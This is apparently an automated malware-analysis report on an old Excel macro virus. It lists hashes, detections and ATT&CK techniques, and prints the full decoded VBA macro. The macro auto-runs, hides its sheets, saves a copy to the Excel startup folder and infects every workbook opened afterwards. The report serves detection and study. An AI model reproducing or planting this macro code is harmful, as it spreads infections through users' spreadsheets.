Xls.Trojan.Manalo-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 0af1a9af5046d8aa…

MALICIOUS

Office (OLE)

Size: 279.5 KB
Created: 1999-10-21 11:15:16
First seen: 2012-06-14
MD5: 8bfa2763930e9356c1494a0e30753f23
SHA-1: b2d8de51de51455cdf8258483e8c687826542400
SHA-256: 0af1a9af5046d8aac6323566dc0051a0221beaed8e24a5537badbaebdef6c1c6
Risk Score: 240

Malware Insights

Xls.Trojan.Manalo-3 · confidence 95%

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

This Excel 5 macro virus, identified as Xls.Trojan.Manalo-3 by ClamAV, uses an Auto_Open macro to execute. The script attempts to copy itself and other sheets into a new workbook, saving it as 'C B I.XLS' in the Excel startup path, thereby establishing persistence. The embedded text 'manalo-e' and the ClamAV detection name further support the family attribution.

Heuristics 4

  • ClamAV: Xls.Trojan.Manalo-3 (severity: critical; ID: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Manalo-3
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster (severity: critical; ID: OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected (severity: medium; ID: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: high; ID: OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13263 bytes
SHA-256: 31cadf8e5cba74200e98976ae73bb90d01cb94377206447a968a45db6ae3a0a7
Detection
ClamAV: Xls.Trojan.Manalo-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Life_Blood"


















'
' INC v1.0
'



Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
        Application.OnSheetActivate = "Jacob"

End Sub

Sub Jacob()
Attribute Jacob.VB_ProcData.VB_Invoke_Func = " \n14"
        
Startup$ = Application.StartupPath
File$ = Dir(Startup$ & "\" & "C B I.XLS")

If File$ <> "C B I.XLS" Then GoTo FileDoesNotExist Else GoTo InfectOpenFile

FileDoesNotExist:
            
   Infected$ = ActiveWorkbook.Name
   
   Application.ScreenUpdating = False

   Set newBook = Workbooks.Add
    With newBook
        .Title = ""
        .Subject = ""
    End With
   
   NewWorkbook$ = ActiveWorkbook.Name
   Sheet$ = Workbooks(NewWorkbook$).Sheets(1).Name
        
   If Sheet$ <> "Life_Blood" _
      Then
        Workbooks(Infected$).Sheets("INC").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
        Workbooks(Infected$).Sheets("Life_Blood").Copy Before:=Workbooks(NewWorkbook$).Sheets("INC")
        Workbooks(NewWorkbook$).Sheets("Life_Blood").Visible = False
        Workbooks(NewWorkbook$).Sheets("INC").Visible = False
      Else
   End If

   ActiveWindow.Visible = False
      
   Workbooks(NewWorkbook$).SaveAs FileName:=Application.StartupPath & "/" & "C B I.XLS"

GoTo Finish

InfectOpenFile:
        
   FileName$ = ActiveWorkbook.Name
   FirstSheet$ = Workbooks(FileName$).Sheets(1).Name
        
   Application.ScreenUpdating = False
   
   If FirstSheet$ <> "Life_Blood" _
      Then
        Workbooks("C B I.XLS").Sheets("Life_Blood").Copy Before:=Workbooks(FileName$).Sheets(1)
        Workbooks("C B I.XLS").Sheets("INC").Copy After:=Workbooks(FileName$).Sheets("Life_Blood")
        Workbooks(FileName$).Sheets("INC").Name = "85 Years"
        Workbooks("C B I.XLS").Sheets("INC").Copy Before:=Workbooks(FileName$).Sheets("85 Years")
        Workbooks(FileName$).Sheets("Life_Blood").Visible = False
        Workbooks(FileName$).Sheets("INC").Visible = False
        Workbooks(FileName$).Sheets("85 Years").Visible = False

      Else
   End If

If Format(Now(), "yy mm dd") >= "99 07 27" Then


Else: Workbooks(FileName$).Sheets("85 Years").Visible = False
End If


Finish:
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "C B I.XLS!Jacob"
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet16"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet17"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable
... (truncated)
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD00001D5F/Ole10Native | 38180 bytes
SHA-256: 764d7393b19744a570246d85899ec3f9049322d7d83c9f6cf618c1008f179e74